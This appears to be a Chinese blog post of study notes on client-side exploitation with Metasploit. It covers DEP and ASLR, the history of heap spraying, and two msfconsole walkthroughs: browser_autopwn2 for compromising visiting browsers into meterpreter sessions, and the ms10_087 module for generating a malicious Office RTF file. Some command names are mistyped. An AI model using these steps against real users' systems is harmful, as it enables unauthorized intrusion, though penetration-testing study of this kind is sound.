Metasploit渗透测试六之客户端渗透

客户端概念

跟服务渗透类似又有区别
客户端是指,IE,Adobe.Office等应用软件为攻击目标。

安全防护机制

DEP数据执行保护
ASLR地址空间布局随机化

浏览器渗透

Metasploit内含100多个攻击模块

堆喷射利用

堆喷射是一种极具历史感的技术,第一次出现是在2001年。堆喷射最初的使用目的仅仅是为了给一些漏洞利用提供一个稳定的可以存放shellcode的地址,诸如在栈溢出利用中使用堆喷射放置shellcode然后劫持返回地址进行跳转(无dep情况)。堆喷射第一次在IE浏览器上的应用出现于CVE-2004-1050的exploit中,采用的是极其经典的nops+shellcode的方式。此后结合千疮百孔的ActiveX,诸如栈溢出,漏洞利用的成本着实相当之低。

browser_autopwn2

MSF自动识别浏览器版本并根据来实行不同的浏览器框架漏洞检测

msconsole
search browser_autopwn
use xxx/browser_autopwn2
set uripach <连接>
set srvhost <shell监听地址>
run
sessions -i
//查看成功之后创建的session列表
sessions -i 1
//连接session进入meterpreter

应用软件渗透

这个需要MSF生成指定的异形文件。针对某款软件

MS10-087 Office rtf解析漏洞

msconsole
search ms10_087
use xxxxx/ms10_087_rtf_pfragments_bof
set payload <攻击载荷>
set filename ms10087.rtf
exploit

总结

这一章节看的非常吃力,而且限制于环境。
对于漏洞环境架设很费时间,没有去操作了。
毕竟书中的实例都有些年头了。实用性感觉不太多,但是分析讲的很详细。
也还因为溢出漏洞需要扎实的反汇编基础。
总之需要深入了解引发漏洞的原理,多动手操作OD跟IDA。

发表评论

邮箱地址不会被公开。 必填项已用*标注